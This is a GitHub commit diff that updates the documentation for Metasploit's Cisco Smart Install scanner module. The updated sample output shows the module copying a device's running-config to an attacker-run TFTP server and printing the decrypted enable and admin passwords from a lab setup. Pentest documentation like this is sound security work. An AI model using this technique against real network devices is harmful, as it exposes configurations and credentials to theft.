Skip to content

Commit 43ff4f1

Browse files
author
Austin
authored
update docs
1 parent 99555dd commit 43ff4f1

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -47,15 +47,15 @@ msf auxiliary(cisco_smart_install) > run
4747
Using the `DOWNLOAD` action
4848

4949
```
50-
msf auxiliary(cisco_smart_install) > run
51-
[*] a.b.c.d:4786 - Starting TFTP Server...
52-
[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
53-
[*] a.b.c.d:4786 - Requesting configuration from device...
54-
[*] a.b.c.d:4786 - Waiting 60 seconds for configuration
55-
[*] a.b.c.d:4786 - Incoming file from a.b.c.d - GZjWgnqv 3015 bytes
56-
[*] a.b.c.d:4786 - Providing some time for transfers to complete...
57-
[*] a.b.c.d:4786 - Shutting down the TFTP service...
50+
[*] 192.168.0.26:4786 - Starting TFTP Server...
51+
[+] 192.168.0.26:4786 - Fingerprinted the Cisco Smart Install protocol
52+
[*] 192.168.0.26:4786 - Attempting copy system:running-config tftp://192.168.0.11/kWqjngYF
53+
[*] 192.168.0.26:4786 - Waiting 60 seconds for configuration
54+
[*] 192.168.0.26:4786 - Incoming file from 192.168.0.26 - kWqjngYF (31036 bytes)
55+
[+] 192.168.0.26:4786 - 192.168.0.26:4786 Decrypted Enable Password: testcase
56+
[+] 192.168.0.26:4786 - 192.168.0.26:4786 Username 'admin' with Decrypted Password: testcase)
57+
[*] 192.168.0.26:4786 - Providing some time for transfers to complete...
58+
[*] 192.168.0.26:4786 - Shutting down the TFTP service...
5859
[*] Scanned 1 of 1 hosts (100% complete)
5960
[*] Auxiliary module execution completed
60-
6161
```

0 commit comments

Comments
 (0)